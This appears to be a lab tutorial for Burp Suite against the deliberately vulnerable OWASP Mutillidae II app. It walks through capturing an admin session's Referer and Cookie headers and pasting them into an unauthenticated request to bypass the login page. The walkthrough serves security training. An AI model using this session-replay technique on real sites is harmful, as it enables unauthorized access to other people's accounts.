Open the Firefox browser to the home page of OWASP Mutillidae II, using the Home button from the top menu, on the left-hand side. Make sure you are not logged into the application. If you are logged in, select Logout from the menu:
In Burp, go to the Proxy | HTTP history tab and select the request you just made, browsing to the home page as unauthenticated. Right-click, and then select Send to Repeater:
Using this same request and location, right-click again, and then select Send to Comparer(request):
Return to the home page of your browser and click the Login/Register button. At the login page, log in with the username of admin and the password of admin. Click Login.
After you log in, go ahead and log out. Make sure you press the Logout button and are logged out of the admin account.
In Burp, go to the Proxy | HTTP history tab and select the request you just made, logging in as admin. Select GET request immediately following the POST 302 redirect. Right-click and then select Send toRepeater (request):
Using this same request and location, right-click again and Send to Comparer (request):
Go to Burp's Comparer tab. Notice the two requests you sent are highlighted. Press the Words button on the bottom right-hand side, to compare the two requests at the same time:
A dialog pop-up displays the two requests with color-coded highlights to draw your eyes to the differences. Note the changes in the Referer header and the additional name/value pair placed in the admin account cookie. Close the pop-up box with the X on the right-hand side:
Return to Repeater, which contains your first GET request you performed as unauthenticated. Prior to performing this attack, make sure you are completely logged out of the application.
You can verify you are logged out by clicking the Go button in Repeater associated to your unauthenticated request:
Now flip over to the Repeater tab, which contains your second GET request as authenticated user admin. Copy the values for Referer header and Cookie from the authenticated request. This attack is parameter modification for the purpose of bypassing authentication:
Copy the highlighted headers (Referer and Cookie) from the authenticated GET request. You are going to paste those values into the unauthenticated GET request.
Replace the same headers in the unauthenticated GET request by highlighting and right-clicking, and select Paste.
Right-click and select Paste in the Repeater | Raw tab of the firstGET request you performed as unauthenticated.
Click the Go button to send your modified GET request. Remember, this is the first GET request you performed as unauthenticated.
Verify that you are now logged in as admin in the Response|Rendertab. We were able to bypass the authentication mechanism (that is, the log in page) by performing parameter manipulation:
